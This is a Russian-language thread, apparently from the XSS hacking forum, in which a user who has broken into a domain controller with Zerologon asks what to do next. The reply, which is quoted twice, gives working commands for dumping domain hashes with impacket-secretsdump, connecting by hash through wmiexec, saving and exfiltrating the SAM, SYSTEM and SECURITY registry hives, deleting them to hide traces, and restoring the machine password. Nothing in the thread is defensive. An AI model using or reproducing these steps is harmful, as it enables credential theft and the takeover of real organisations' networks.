Есть уязвимый DC. Пробил его zerologon(из mimikatz).
Каковы дальнейшие действия?
Каковы дальнейшие действия?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
PrivEsc zerologon mimikatz
- Автор темы SlowMan
- Дата начала
Дампишь хеши
proxychains4 imapcket-secretsdump -no-pass -just-dc DC_NAME\$@DC_IP -outputfile /home/dump
Подключаешься по хешу к примеру через wmiexec и делаешь
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save
достаешь хеш для возрата пароля
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
и возращаешь пасс https://github.com/risksense/zerologon
proxychains4 python3 reinstall_original_pw.py DC_NAME DC_IP MACHINE.ACC
Где-то еще зера пробивает?
proxychains4 imapcket-secretsdump -no-pass -just-dc DC_NAME\$@DC_IP -outputfile /home/dump
Подключаешься по хешу к примеру через wmiexec и делаешь
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save
достаешь хеш для возрата пароля
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
и возращаешь пасс https://github.com/risksense/zerologon
proxychains4 python3 reinstall_original_pw.py DC_NAME DC_IP MACHINE.ACC
Где-то еще зера пробивает?
Последнее редактирование:
- Автор темы
- Добавить закладку
- #4
Разобрался. Спасибо.